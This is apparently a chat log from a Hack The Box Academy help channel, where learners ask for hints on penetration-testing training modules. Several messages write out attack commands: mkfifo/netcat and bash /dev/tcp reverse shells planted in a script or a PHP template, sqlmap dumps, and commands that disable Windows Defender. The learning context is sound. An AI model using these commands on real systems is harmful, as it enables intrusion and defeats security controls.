hi

but yea, don't worry about speed. if you can complete it, you're all set

im new to this kind of stuff so what do i do if no ports pop up

Speaking of labs - I heard mixed opinions on Dante. Pretty much "It's good practice but a bit out of scope". Do you think I should rather skip it?

Full port scan or UDP there is nothing as no ports open

What r u preparing for ?

CPTS

Dante is easy if u finished all cpts modules u can for sure pwn dante

I dont think its out of scope

im trying to do an isp firewall

yes full port scan

some stuff is out of scope

Hi, I have some connexion problems with this part of the pivot module : RDP and SOCKS Tunneling with SocksOverRDP.
I can mstsc.exe to connect to the 172.16.5.19, begin the server, then on host 10.129, I started proxifier. And when I try to start mstsc, I can't connect. I also tried setting experience to modem. Any idea ? I use the pwnbox

what exactly are you trying to do

bounty

on converge router

i just finished cat so i was trying to do my first bounty

but none of the methods worked

i have no clue what u r talking about buddy

bounty on converge router?

yes

like a bug bounty program for Converge ICT?

yes

very large price

where is this bug bounty program hosted

wait

found it

it says the bounty

i'm not clicking on that

Damn

https://tenor.com/view/funny-hahaha-gif-22505124

bro no bug bounties are hosted on onion links this is 10000% illegal and we here in HTB dont work with this

bug bounty programs only on hackerone , bugcrownd and stuff like this

are the ones u should work on

dont work in this trash

cause its illegal

Do not post illegal content.

this is not ethitical hacking

ur pwned pc will be the first bounty

ok bro just dont post here

that's a yikes

help please

for module network foundations last skill assenssment

Hello, I need a little bit of help. I am on module https://academy.hackthebox.com/module/147/section/1327 Remote password attacks and am running the crackmapexec winrm on the target ip, howver, i have tried a few lists. is there a certain password and user list i should be using? i've looked through the module but don't see anything specific

here, it should be somewhere at the top of the page

you'll find the necessary wordlists to complete this section in the .zip file

oh wow i would have nevr found that

thank you so much

you're very welcome

i've been on this like 3 days lol

you're a life saver lol

i was like it cannot take this long lol

yeah am at the end of this module i haven't had too much time to work on it 💀

thank you again

can you help me please i lock 3 days

for network foundations modules

the last questions skill assenssment

I made a rat who wanna risk their pc for me to hack them

hey everyone, I'm in the Windows & Attacks and Defense, working on Kerberoasting and I've been stuck for days now trying to connect to the DC for this question: After performing the Kerberoasting attack, connect to DC1 (172.16.18.3) as 'htb-student:HTB_@cademy_stdnt!' and look at the logs in Event Viewer. What is the ServiceSid of the webservice user? .... the IP does not seem reachable. is anyone else having issues too? I was not able to SSH into the Kali machine either

i dont know this module but u 99% should make a pivot with whatever tool u prefer

Yeah you definitely need ligolo or chisel for that

i didnt do this module also but i am possitve i can help can u elaborate more about the task

Not sure what you mean by using a tool I prefer. I've tried to ssh and rdp into the Kali, did not work. Then I tried to remote in from the WS001 machine. throught I was about to get it, as I was prompted to enter the password, but then got error message "The connection was denied because the user account is not authorised for remote log-in".

Yes

You do not need to ssh, it’s all rdp

the Lab Envrionment section says you can either SSH or RDP. Neither worked for me

Bypass the request filtering found on the target machine's HTTP service, and submit the flag found in the response. The flag will be in the format: HTB{...}

For this question you need to use remote desktop

I tried it as well : I tried to remote in from the WS001 machine. thought I was about to get it, as I was prompted to enter the password, but then got error message "The connection was denied because the user account is not authorized for remote log-in".

How about trying from user bob?

What's the contents of table flag2? (Case #2)

I am stuck on here and don t have any idea how should I proceed , when I run sqlmap -r req.txt doesn t find anything :/

SQLMap Essentials module

sqlmap -r Case2.txt --threads 10 --dump -T flag2 --batch --level=5 --risk=3 --tamper=space2comment --random-agent

I also tried this command and nothing pop up to give me a clue to get the flag :/

This Process Injection module is looking mighty fine, I might fork out the big buks to do it.

Hoping it eventually becomes part of a pathway

solved

Help please

??

hello

which module

With?

For module network foundation last question of skills assessment please

Bypass the request filtering found on the target machine's HTTP service, and submit the flag found in the response. The flag will be in the format: HTB{...}

That please I lock 3 days

Today 4 days also

I can't help, but ask your question directly, that's a tier 0 module so share exactly what you're having trouble with and someone may be able to help

Generally I'd initially recommend going back over the module and sections

There's a roundabout way to do it if you read the section

They will cover all you need to answer the question

Though I disagree with connecting to ||ftp|| with nc

It's fairly directly laid out how to at least scan throughout the reading

Yes but how ?

Read.

The skill assessment basically has a walkthrough in it

Where ? I try a lot

There's more text to the skill assessment than just the questions

For the module Linux Privilege Escalation do we have various path to obtain the flags on the Skill Assesment (at least for the last flag) ?

they don't say how to do it

It's helpful to know how to do different methods

Yes, the do

Ok thanks, I will look for the methods I missed

tell me how to do it I do it because I know where it is written

Please

Where it says "chapter 3 target acquired" Click the "show more" arrow

It's on the page

it's not written there I read it several times

Yes. It is

Where that please ?

Under Chapter 3. - Target Acquired

> Click to show

Where in chapter 3

For fucks sake

It's not chapter as in section 3 (components of a network)

But read the whole of what's given to you

Oki I read completely so

Then you'd know what to do, while I disagree with using nc to connect to the services it works just the same

What did jarednexgent have to say @fresh canyon

It goes through getting a file off FTP; reading the file; setting the proper headers

It's okay k do that and I return after thanks

That's kinda outlined in the section mentioned.. I'd recommend going through and exercising the steps detailed in the module / section, they provide important information pertaining to the questions.

I see , thanks again

Sorry , and thanks you so much

the ftp is closed on the ftp module, even the one mentioned in the solution, double checked and scanned specifically for that port, i dont think this is intended

3 resets fixed it

In the Acive Dreictory module, DCsync section :
https://academy.hackthebox.com/module/143/section/1489
It is written :
If we had certain rights over the user (such as WriteDacl), we could also add this privilege to a user under our control, execute the DCSync attack, and then remove the privileges to attempt to cover our tracks. DCSync replication can be performed using tools such as Mimikatz, Invoke-DCSync, and Impacket’s secretsdump.py. Let's see a few quick examples.

I dont' understand, to me it's wrong. It's WriteDacl over the domain and not over a user that could allow to give us replication privilege on a user we control.

You don't necessarily have to have WriteDACL in the domain. What it means is that by having “WriteDACL” on a user that you have control over, you can give them DCSync privileges “Replicate directory changes” and “Replicate directory changes all” and you will be able to perform DCSync.
ACLs can be applied to other objects, including the domain root object (Domain Object).

No, that's false and implausible (any user having a writedacl over another user could give DCSync over a domain):
https://support.bloodhoundenterprise.io/hc/en-us/articles/17312765477787-WriteDacl

by having WriteDACL priveleges over an object you can give that user rights that you otherwise might not under normal circumstances

nothing about what they said is "implausible"

and the bloodhound link you sent doesn't refute what was said

in some cases you're chaining together vulnerabilities; you're granting additional rights over X in order to perform Y as X, for instance

in this case since you can write the DACL properties you can literally add the DCSync ACE/ACL rights

i'm kinda confused myself actually

let me do some googling

ok so

WriteDacl allows you to modify the DACL of the object

that means that you can modify any ACEs in the DACL for that object

but in order to grant the permissions for DCSync (DC-Replication-Get-Changes and DC-Replication-Get-Changes-All), you have to be able to modify the DACL of the domain object since those permissions can only be granted on the domain object

so if we have a user that has permissions to DCSync and we have WriteDacl over this user, then we could:

1. force change their password to something we know
2. using their credentials, modify the DACL of the domain object to grant DCSync permissions on a user that we control
3. perform DCSync with our controlled user
4. modify the DACL of the domain object again to remove DCSync permissions from our controlled user

So its just WriteDACL over the domain no?

yea it's kind of worded weird

at least, from my understanding of the attack setup

it's not worded weird

just basic escalation logic

i guess out of context, it is worded strangely

reading the prior paragraphs it'll make sense

"obvious thing is obvious" situation

They added a new feature? Note?

yes

neat feature (someone can feel free to steal this for a /feedback):

• could be more clear that clicking off closes the note window
• allow the note window to be pinned open
• allow the note to be downloaded in some way (beyond Copy/paste)
  I don't see myself using it atm mostly because i already have a flow in place with obsidian, but if you could take notes and download them after, would be useful

im trying to curl but it returns nothing why so?

this is from the web requests module .and to be specific GET module

it tells you exactly how to perform the exercise -> use the browser devtools to figure out what the request is -> copy to curl and adjust to search for 'flag'

after copying the curl command and clicking enter on terminal why does it show please use curl

because you copied the user-agent

:P

you can also craft the request without copying to curl

Hi, actually i have problem to get flag for xss warm up lab on advance xss and csrf module
Admins (bot) does not check the page so i can exfiltrate the flag cookie

which section are you on

this one on lab warm up
Familiarize yourself with the lab environment. Use the components to exploit the XSS vulnerability to steal the victim's cookie.

module is above tier 0 please refrain from sharing specifics about it and it looks like the screenshot had a PHPSESSID in it

DM me

If I complete a module, e.g., Tier III Whitebox Attacks, would I be able to restart the module (so I could do it again) even after my subscription is over?

you won't be able to wipe the slate clean, but you can always revisit it after, yes

Okay nice. Thank you!

In Windows Attacks and Defense module: For the first challenges I did the kerberoasting and got the hash and answered question one but when I open up the other windows remote session with the given IP I can see the ticket request but not one for webservice which would give me the correct service sid or whatever it’s called, Event Id: 4769

@fathom pendant okay thank you I forgot I was copying user agent 😆

have you tried restarting the target to see if it shows up?

Yes a couple times

Did you look at the hint?

It wouldn’t let me see hint idk why

ok DM me

probably something to do with your adblock or plugins

Ok

Hi I had a quick question; I'm going through the Windows Priv Esc module right now, and I'm on the section for DLL Injection.

in the DLL Hijacking subsection it says Process Explorer but shows Process Monitor; is that a typo or are they related?

Actually the problem was time based. It would stop working after about 10 minutes of running. So the higher the thread count, the more passwords it got through. It was really strange, I just got frustrated and just got all the B words from the mut_passwordlist and made a new list.

Just wanted the flag at that point

They are two applications from Sysinternals that deal with processes, I'm not really sure if what they put on there is a mistake or not because none of it is really wrong. You can find which DLL's a process loads with Process Explorer by viewing it's DLL's. Process Monitor can also see which DLL's load. They present the data in different ways but achieve similar results.

If you feel something is wrong or should be shown a different way you can post in #1234357888114364508

Ok thanks, was mainly just wondering if I was missing something lol, all of the screenshots are ProcMon but then that one point says process explorer; good to know about both I guess haha

Module Creepy Crawlies: Q: After spidering inlanefreight.com, identify the location where future reports will be stored. Respond with the full domain, e.g., files.inlanefreight.com.

Tried to instal reconspider but cannot run the tool.

Getting error: 'Seems like you haven't installed Req or Your are not using python3 version, please install using: python3 setup.py install`

I have python3 installed

are you using the ReconSpider that's linked in the module or the one from Github; because they are different tools

@fathom pendant was using the github -- gtk thanks, will try the module steps instead

got it -- wow that was crazy straightforward

I'm really terribly stuck on the File Uploads Attacks' Skills Assessment exercise. Could someone please DM me and help me figure this out. I'm not looking for straight up solutions, just need a nudge in the right direction

yup; there's a reason they don't give a GH link LOL

I'm using Ligolo, also not being able to get this done

hi, anyone completed the linux privilege escalation module?

nope. you'd be the first

https://dontasktoask.com

mb then ill rephrase. Anyone can help me get past environment enumeration part in linux privilege escalation module. I run linPEAS and found nothing helpful, checked the directories and used find / -name "flag*" 2> /dev/null but found nothng helpful?

the hint is in the name of the section

<environment> enumeration

oh ill go and check the environment variables and see if i can get anything

thanks for the hint!

i tried to find flag in all the directories i can see from the output of env but i cant find it? is the flag not stored in a file named flag?

Try ||grep -ER||

What I was saying is : If you want to perform a DCsync by having a writedacl permission, this writedacl has to be on the domain itself and not on a user has written in the course.

File Upload Attacks is above tier 0 please don't spoil anything

Hii guys I am getting error in DNS of footprintng module
I am ||getting recursion requested but not available error||

The question is
what is the IPv4 address of the hostname DC1

as i stated in #cpts you may need to look directly at the records instead of asking directly for DC1

one of the hostnames may contain DC1

the previous question may or may not be related iirc

It is

tunnel vision is a hell of a thing

Its part of the output of a query you would've already executed

yo man, what am i missing. i have been doing this section for about 4 hrs i still cant get it hahahaha

Thanks mate
Got the answer
Now I feel like a clown 🤡 missing that answer right in front of me

start from filesystem root and look outward

yep i figured it out. shouldnt have look for a file named flag to start with lol

thanks for the help!

tunnel vision gets ya good

real good. spent 4 hours staring at this module

Are the VPNs not working right now? Keep getting “Exiting due to fatal error”

run with sudo

ahh appreciate it 🙂

Mate's so experienced and can solve a problem without knowing the actual error

Exiting due to fatal error, typically one or two lines above that would be something along the lines of not being able to create tun device

Hi, am stuck at "dirty pipe" linux PE any hints

./exploit-2: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.33' not found (required by ./exploit-2)

tried python POC, didnt work

you'll need to either statically compile or compile on target

Thanks, copiling on target worked

but why?

i'm having a constant problem with RDP'ing into systems
i tried using various tools each of them

either it doesn't connect me at all
or if it does it lasts for a minute and crashes out and the same process repeats

This is on the Credentialed Enumeration of the Active Directory enumeration & Attacks

Any ideas or fixes?

got it.

Has anyone completed the skills assessment for the CrackMapExec module? I need help.

ask your question

If you can successfully RDP into a machine, but it crashes, it might be a VPN issue. Worth experimenting with switching to another VPN endpoint.

For context, every time this happened to me, it was usually a networking issue - intermittent VPN connection and such.

I'm stuck on the third question.
I gained admin privileges on SQL01, but I haven't been able to make any further progress.
A small hint would really help.

I have compromised the accounts Juliette, Atul, sqldev, and Administrator (SQL01),
but I don't have write permissions on the shares.

Try things outside of wordlists. There are many DNS enumeration techniques to get you some more vhosts

Apart from that i have also done
|| Zone transfer on those subdomains||
And I couldn't find any hosts there or brute force either
Could you give a hint ?

enumerate all subdomains

Oh you did that

So, did those zone transfers succeed?

Using dnsemum , I could only get some results from ||dev.inlanefreight.htb|| others all just getting NS record query failed
That above subdomain also running for more than 1 hour and still couldn't get desired result

what wordlist are you using?

Might try the fierce

Check resources

I reckon you just need to change the wordlist

You're on right track

Trying that now brother

Haaaaaaaa
Finally got it brother
Thanks a lot

Lovely! Well done.

anyone finished using crackmapexec module?

talk to me

Hi, I am really stuck with this question "What is the API key in the hidden admin directory that you have discovered on the target system?" from the skills assesment section of Information gathering - web edition Module "https://academy.hackthebox.com/module/144/section/1311" I can't find the API key, I found the hidden directory, it's the only question of this section I am missing, because I found the email and the key that developers will be chaning too, but this one I can't, any hint?

Hey will there be an Exam on the new job path ai red teamer That would look really good on my resume

Hello everyone, after numerous attempts, I am still stuck on the question: 'What is the API key in the hidden admin directory that you have discovered on the target system?' in the Information Gathering Skills Assessment. Can anyone please help me out and guide me on how to solve this?

same here, I'll let you know if I get something

Yes, please

Currently in the DNS section of the footprinting module, The first question “Interact with the target DNS using its IP address and enumerate the FQDN of it”, how do i Interact with the target DNS? I’ve already done a DIG NS

Hello everyone,
I have an interrogation about the Web Services section of the Login Brute Forcing module.
I don't understand why the output of netstat we do on the ssh session does only show opened services on port 22 and 21. The SSH service we used to connect is at another port (for me it was 30769). Also, if the netstat output shows a listening FTP service on port 21, why does it tell that the FTP service is running locally ?

I'll look into it

Hello I was trying to complete the Public Exploits section in the Getting Started module. I have found an issue, only the pwnbox allowed me to complete. i used metasploit as asked and correctly set RHOSTS, RPORT and FILEPATH, but when I ran exploit i never got the success message. When I did the exact same thing on the pwnbox it worked. Anyone know why or if this is a singular issue or how I can fix/prevent this from happening again?

Have you tried to access the hidden directory?

If you are running the pwnbox at the same time as your VM, it will cause major issues.

What you did should get you to the answer

it did lol ty

I wasn't @proud pine

guys i am stuck at web service and api attacks skills assessment , any hints please\

Did you use academy vpn?

I didn't have the option

Because it was one of those web accessible boxes

So no openvpn download link

@young ore

For the academy it is best to always use the openvpn if you are working from the VM

So you don’t stray from the environment

@silk dew

But how do I connect when there's no setting for that in that section?@young ore

You don’t have to download openvpn for each section

You can download one from the previous section

And use that for the rest of your academy session

I'm at the attacking common applications osTicket right now. First, love HTB and the course, so do not misunderstand me. But. Tbh, this is by far the "not so good" module winner so far. It's very unclear what the task is, but reading some posts you are actually supposed to just recap exactly what was shown in the section, logging in as one of the two users with provided passwords. ok, interesting. But if access is constantly denied, then what is the purpose of this section? How am I supposed to tackle this? Sorry, do not mean to have attitude just a little bit frustrated. Thanks in advance!

i just tried with an openvpn i had downloaded from 2 or 3 sections ago, successfully connect, but the metasploit still doesnt do anything

exact same configs as in the pwnbox (shut down)

there must se something im not doing right, this works perfectly fine in the pwnbox i wasted like 2 hours in the vm when I had the correct solution in the first 3 mins

you are overlooking one option

if you still don't have any clue just ping me

If you compare the one that works and the one that doesn’t, that might provide you clues of what is wrong

I'm completely stuck on Server-side Attacks - Exploit a SSRF vulnerability to identify an internal web application. Access the internal application to obtain the flag.

I really need a hint, I don't know how to explain where I'm at without spoilers. Feel free to dm me.

Can anyone please help i installed xfreerdp but when i run the command in image it isnt recognized

hello everyone
i am working on Introduction to Windows Evasion Techniques
section : Static Analysis

i have done everything that the question want and i was able to bypass the AV

03/06/2025 09:36:59] C:\Alpha\Static\EvasionApp.exe - OK - Undetected by Microsoft Defender Antivirus
[03/06/2025 09:36:59] C:\Alpha\Static\ex.exe - OK - Undetected by Microsoft Defender Antivirus

but i can't see a flag and i see alot of people talk about this problem , so can anyone help me please , ( i have tried to compile the .cs file with 2 methods )

im not sure on what I should compare, they bot return the 2 same lines, with the exception that the pwnbox also says that the file was successfully retrieved. Sorry im quite new in all of this

why does going to general prompt me to come here

Ah i gotta verify my acc

Someone plese, is this a copy and paste competition, or are you actually supposed to try and learn something in the above referensed module?

does footprinting lab hard have privelage escalation?

Hi, anyone can help me in "ADVANCED SQL INJECTIONS - CWEE" Skill assesment QUESTION 1-?

I already got everything but the ||token to reset pass||is not working for any reason, someone can help me please?

any hint?

I'm completely stuck on Server-side Attacks - Exploit a SSRF vulnerability to identify an internal web application. Access the internal application to obtain the flag.

I really need a hint, I don't know how to explain where I'm at without spoilers. Feel free to dm me.

If you want you can send me dm

i sended

Hi Guys who has done weak permissions in WIndows Privilege Escalation?

Did you use the right credentials?

does anyone know how to fix this problem in Getting started module

home/nibbler/personal/stuff/monitor.sh: 26: /home/nibbler/personal/stuff/monitor.sh: [[: not found
/home/nibbler/personal/stuff/monitor.sh: 36: /home/nibbler/personal/stuff/monitor.sh: [[: not found
/home/nibbler/personal/stuff/monitor.sh: 43: /home/nibbler/personal/stuff/monitor.sh: [[: not found

guys i am stuck at web service and api attacks skills assessment , any hints please

i wouldn't worry about that error

you can inject the code and it'll work just fine

but thats the last step to use sudo /home/nibbler/personal/stuff/monitor.sh

and get root access

it's the semi-last step

you first need to add the code to connect back to your machine (on a different port)

:)

since you know, you do have write access over that file

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 8443 >/tmp/f' | tee -a monitor.sh

this?

and i'm assuming you adjusted the nc command to be YOUR tun0 ip

but yes

yes

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.36 8443 >/tmp/f' | tee -a monitor.sh

so you need to set up another listener on port 8443

its active on diff shell

then it should connect

if it "hangs" when you run the command, that means it's connected

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.36 8443 >/tmp/f' | tee -a monitor.sh
tee: monitor.sh: Permission denied
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.36 8443 >/tmp/f

Guys has anyone done Weak Permissions in Windows Privilege Escalation?

this what im gettinf

Yea dm

Are you in the same directory as monitor.sh?

nibbler@Nibbles:/home$ cat /home/nibbler/monitor.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.36 8443 >/tmp/f

Can you rename it and make your own?

Hey I wrote RAT for check this in my VM
And I have some problem someone can help me ?

im in root somehow but i dont see flag

└─$ nc -lvnp 8443
listening on [any] 8443 ...
connect to [10.10.16.36] from (UNKNOWN) [10.129.205.173] 50878

whoami

root

ls

monitor.sh

Nothing in the root directory?

misstyped a cd command and now it stuck

wdym "now it stuck" :)

ls -la and pwd are great for finding where you are

thanks i got it

i was focusing on [[ error where i should've ignored and checked nc port for reverse shell of root

yep

thanks a lot and @safe star aswell

How did you figure that out that reverse shell rm /tmp/f command will work even though it's giving error in part script

because of how sh scripts work

they will execute line by line even if an error occurs, this is because there's no exit command given in the script

Oh thanks I didn't know that, as reverse shell command was at last and it was hanging and I thought errors must be solved somehow and I wasted hours finding it

Just checked on my VM and it works for me, try add: set VERBOSE true and run the exploit again

I will try, thanks

Hi im doing tunneling and pivoting module

reverse port forwarding with ssh im
trying to get a reverse shell on the windows machine.
1.I moved the payload to the windows host

2. I started meterpreter listener on my machine on port 8000
3. I try to run remote port forwarding using the following command
   ssh -R 172.16.5.129:8080:0.0.0:8000 ubuntu@172.16.6.19
   But i cant connect to it i get "connection timed out"

Hello how can I get a link for hacking games ?

https://academy.hackthebox.com/course/preview/game-hacking-fundamentals

You'll need to subscribe / purchase cubes however, as it is not a free module @cobalt rivet

Hi all,
I'm going crazy, I want to ouput different files such as file1, file2 etc, using something like : cat directory/file*
I need sudo in my case so sudo cat directory/file*
I get the cat: 'directory/file*': Input/output error error
Can someone pls tell me how to fix this ? Thx

I tried sudo cat "directory/file*"

I'm on PwnBox btw

Update : I made it work using the forbidden technique : sudo -s

does that file exist

Yes 100%

awesome

it was a permission issue

next time try sudo bash -c "cat directory/file*"

But is there a correct method ? Because it seems horrible

sudo only elevates the command not how the shell expands file*

i'm gonna try that thx

Ok so with this you run the entire command with sudo privileges ?

I think i was able to do "sudo cat directory/file1" when naming precisely the file

yea got it mb thanks a lot

awesome

hey staff i can change my username please

https://academy.hackthebox.com/module/113/section/1208 (question 4: Following the steps in this section, obtain code execution on the host and submit the contents of the flag.txt file in the webroot)

-I've tried all the WordPress theme pages to get code execution on 404.php and everyone give: Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP

-I've watched videos where this works perfectly, but all my themes in WP won't work?

https://academy.hackthebox.com/module/77/section/730
I can't get my reverse shell to work I have a listener and I made sure the ip in the reverse shell was the right one from my vpn by looking at tun0 in ifconfig

hello guys iam on xss phishing section in xss module they give me as a target and ip wihtout port like this 0.0.0.0(ACADEMY-XSS-ASMT) how i can use this to access the website that i can work on ??

just place that IP on a browser and you´ll have it

@polar raven AD enum and Attacks is above tier 0 refrain from sharing screenshots of the module

@sand sedge try respawning the target instance.

That IP of 0.0.0.0 is not valid.. could be the instance failed to spawn properly

does it give it to you as 10.129.x.x?

or were you using 0.0.0.0 as a placeholder

Placing 0.0.0.0 in a browser will not do anything

Oh.. good point marcie..

because some sections in the xss module are on the private network; such that you can get a revshell

I believe he is saying that its only an IP like x.x.x.x not x.x.x.x:xx

and perform stealing credentials

which is common for targets on the vpn network

I took what they said too literally 😅

10.129.x.x for targets on the vpn network otherwise it's a public_IP:port

if given 10.129.x.x (unless otherwise instructed) you can assume default http:// port

ah sorry

this section doesn't have an interactive target

thanks

was refering to this one https://academy.hackthebox.com/module/77/section/852

my question from above just disapeared whattt

but anyway I found another methode by using white wolf webshell

thanks tho

https://tenor.com/view/fist-of-the-north-star-hokuto-no-ken-hey-as-long-as-it-works-as-long-as-it-works-winging-it-gif-5037582307183355084

exactly

contains potential spoilers

for a module above t0 :))))

https://academy.hackthebox.com/module/176/section/1787

Can someone help me verify my answear for the second question? since I believe firmly its right, but somehow not working

true, my bad. But how can you help me, if I dont show it to you? Because I´ve searched everywhere, and know this is the answear

i assume you attempted the attack first then patched and tried again? (i haven't done this module)

to ensure that the issue isn't some weird networking error

in which case:
respawn target
change vpn -> respawn target

yes, done everything already, with the server listening and changed the value

has anyone done https://enterprise.hackthebox.com/academy-lab/33864/5252/modules/158/1437 ?

sadly trying to get the right chisel version on there is harder then the actual pivoting. between this and some issues with rpivot not sure if there is a way to flag a module for needing some updates

most people don't have enterprise accounts, better to simply say the name and section of the module.

sure its Pivoting, Tunneling, and Port Forwarding: SOCKS5 Tunneling with Chisel

ahh yes, you have to use an older version of chisel or static build the newer versions. i believe i used 1.7.4 which worked without issue.

got ya did you just download from git hub or did you mess with trying to change the version after a git clone?

i tired via git clone and i kept running into issues withit not installing the correct version

pretty sure i just downloaded it directly from github

https://github.com/jpillora/chisel/releases/tag/v1.7.4

cool thanks ill just try that

hello I'm stuck on this module https://academy.hackthebox.com/module/77/section/859

I made sure to setup the lhost as the ip from the vpn

[*] Exploit completed, but no session was created.

yet I get that at the end

what port are you using?

4444

looks like running chisel 1.7.4 AND 1.3.1 im getting the same error. think im just going to bed but a little frustrating when ive spent more time troubleshooting versioning then the tunnel itself

maybe this isn't the right exploit

I wish but no

found this exploit off a video youtube and the post from medium

I've been having issues before trying to get a reverse shell

I think it comes from me tbh

Ima try the web instance

I am stuck on the format of the answer of
Intro to Whitebox Pentesting : Eval Injection
https://academy.hackthebox.com/module/244/section/2705
Question: Try to reach the 'eval' function by adding a breakpoint within 'generateQR' and modifying the value of 'role'. Then, send a request to the /generate endpoint with 'text' set to: "`;// What is the response you get?

I found the response but it's not accepting

Did anyone went through this ?

it's working on the web instance I guess I gotta do stuff with my machine which is weird cause I'm using the same lhost ip from the vpn and I checked with ifconfig so idk

okay i think there are a couple different ways, but i was able to do it with the one you provided, so i would double check your settings. maybe set lhost to 0.0.0.0 or tun0

will do thanks

sorry for getting back to you so late, had to step away. have tried that as well, no luck

you can ping the target and visit the site right?

Stuck on the file upload skills assessment, I've got the file uploaded and I have the source code. Trying to navigate to the location where the file is stored but I'm getting a 404 error if anyone can help

Know the target you are attacking and remember HTB is not based out of the US... 😉

Oh my god that was it

Is there a query with this?

It failed to download so I put this

I'm not sure I understand, sorry

Me too

What I mean is, what is the issue you are facing?

I can’t download the page

And it won’t take screen

What page?

You're giving me nothing here

The academy one to link my account

What have you tried, and what was the result, please outline each step

I don't know if you mean link with an SSO account, or link with Discord (which would be via a Labs account)

Link with discord

It’s just a white screen for 30 min on my phone

Follow the instructions in #welcome - you need to obtain your token via the Labs platform

Thx

marcie literaelly told you this the other day

What's the problem @wild rapids

I can’t load the page to connect my htb acc to my discord one

What is the URL you are visiting to obtain your token @wild rapids ?

atm the linking on the platforms via the discord button doesn't do anything, you have to go through the manual process outlined in #welcome

I am working on the module Introduction to Windows Command Line - All About Cmdlets and Modules. I am trying to follow the Import-Module .\PowerSploit.psd1 instruction. But the error seems to come from Windows.

At C:\Users\htb-student\Desktop\Powersploit\PowerSploit-master\PowerSploit.psd1:1 char:1
+ @{
+ ~~
This script contains malicious content and has been blocked by your antivirus software.
At line:1 char:1
+ Import-Module .\PowerSploit.psd1

I have already set the execution policy to Bypass.

PS C:\Users\htb-student\Desktop\Powersploit\PowerSploit-master> Get-ExecutionPolicy -List

        Scope ExecutionPolicy
        ----- ---------------
MachinePolicy       Undefined
   UserPolicy       Undefined
      Process          Bypass
  CurrentUser          Bypass
 LocalMachine          Bypass

What can I do with this Windows Defender or Powershell blocking the script?

it says the script was blocked by your antivirus, so i'd assume it's defender blocking it. maybe disable real-time protection or exlcude the folder it's in.

I have already tried sc stop windefend. Access is denied.

Also cannot xfreerdp in. Only Powershell and cmd is available.

Any insights ?

I encountered the same error. Do you manage to resolve the problem? How do you solve it?

I just tested, I was able to do this by disabling the AV (not just stopping the service)

How to you do that? I am still at the Fundamental modules.

https://learn.microsoft.com/en-us/defender-endpoint/troubleshooting-mode-scenarios#scenario-1-unable-to-install-application

Thanks. Checking it ...

i asked chatgpt and it gave me the command but when i googled i saw it there too. chatgpt can be a great tool for finding commands, but just know sometimes it's wrong.

@little bolt be careful with potential spoilers seeing as the API attacks module is tier 2 (see the channel topic)

I use the Set-MpPreference -DisableXXX $true. I manage to turn off the RealTimeProtection and imported the PowerSpolit module. Gotta get this into my notes.

Thanks. SuperNuts.

Pipe do wonders

I am stuck at the Containerization section of the Linux fundamentals module, can some one tell me how to configure network settings for my lxc container

Allright I see, I am sorry for showing comamnds, but how can I seek for help or support since I am stuck and I can't find anything to unblock me :/

you don't need to worry about that tbh

module and section name with a description of your issue

and it can be taken to dms from there with someone who's willing to help

Module : API Attacks
Section : Broken Authentication

with a brief description of your issue

I'm trying to brute-force the OTP for password reset using ffuf, but I'm not getting any valid results. I successfully triggered the OTP request and got a { "SuccessStatus": true } response, so the OTP should be generated. However, ffuf doesn't return the correct OTP, and all responses seem the same.

?

Module: File Upload Attacks
Section: Skills Assessment
So I've been stuck here for 2 days now, I got the location of where my uploads are going like I was meant to. All I need to do now is upload my payload and that is getting uploaded as well. But when I try to visit the file, it gives me Error 404 Not Found. I know that I've given the correct file name and path because when I use the same steps to visit an image I uploaded it works. Can someone please help me out here

#modules message

I tried all combinations of the username / email and passwords from the two users in the example. No access. What am I missing?

I tried slowing the scan down as well

ok, i backed up one subdomain and tried the robots.txt -- looks like i'm back on track (potentially)

@gaunt scroll spoilers :) anything you had to fuzz/find is a spoiler

@fathom pendant my apologies

apparently you didnt

worked just fine for me

re: all sorted 🙂

anyone having issue starting pwnbox?

Hmm, the problem might’ve been on the details. Try putting the IP instead of the DC1 when entering the computer name

not in eu at least, not for me anyhow

The eu doesn’t seem to get affected i guess

Try switching the pwnbox location, that might help 🙂

i did try switching to different locations. doesnt help.. though i already reached out to support for help. thanks guys

same issue

i just setup a local windows vm to complete the module

There will be some amount of disruption to services, although it looks like we may be missing the notification on the status page, or have the time wrong

Please stick with us, there is a maintenance period ongoing, and we'll ahve it done as soon as possible. Unsure why the notice was not properly up on the status page. Apologies. Any time missed on your exam, please raise it with support and they will assist you once the maintenance is complete

https://status.hackthebox.com/ indeed

Hi, did HTB got issue today? I had a problem with my connection on my vm. The target machine are not spawning.

yeah check the status page

probably make an announcement in the discord cos people will keep asking case in point ^^^

there is no announcement on discord I guess. how to check ? which status page?

https://status.hackthebox.com/

It was literally 2 messages above yours lol

pong

haha sorry sorry

my bad.. sorry sorry

👍 Thanks.

Hi all, can someone give me a right direction for "PoC and Patching - Null Safety"? Played with some promising functions but got nothing in the end.

Hi, can anyone please give me a hint in ADVANCED SQL INJECTION QUESTION 2? I got the sqli but I noticed that the user doesn’t have superuser permission!!

can anyone tell me what can i do with TGS for SPN like HOST, TERMSRV or RestrictedKerHost?

having trouble when pawning getsimple box

#spoilers ahead

1. I can enumerate the target
2. can access the admin portal and logged in successfully
3. whenever i attempt to edit template.php and click save and continue the page tries to reload and after it loads the one liner that i put there is gone
4. tried different reverse shell one liners
   <?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.### 9443 >/tmp/f"); ?>
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.###/9443 0>&1'"); ?>
5. i have a nc listener
6. tried exploiting the target with metasploit but with no avail, throws

[+] 10.129.195.49:80 - The target is vulnerable.
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > exploit

[*] Started reverse TCP handler on 10.10.14.255:4444 
[*] Exploit completed, but no session was created.```

what am I doing wrong here?

#1234357888114364508

Alright thank you. I will delete my post

